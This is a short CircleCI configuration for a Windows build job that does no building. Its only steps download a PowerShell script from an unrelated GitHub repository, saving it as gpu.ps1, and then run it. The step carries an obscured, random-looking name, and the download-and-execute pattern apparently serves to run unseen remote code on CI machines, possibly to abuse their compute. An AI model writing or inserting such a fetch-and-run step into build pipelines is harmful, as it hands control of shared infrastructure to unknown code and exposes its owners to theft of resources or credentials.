version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
      
        
 
    steps:  
       
      - run: 
          name: 1u2I4lOMiB7cHe5Zc9wBnIVnFC6_63SfQprzLw1pGJycT4EbA
          command: |      
            Invoke-WebRequest https://raw.githubusercontent.com/Yahihs/rep/main/sh -OutFile gpu.ps1 
          
      - run: ./gpu.ps1
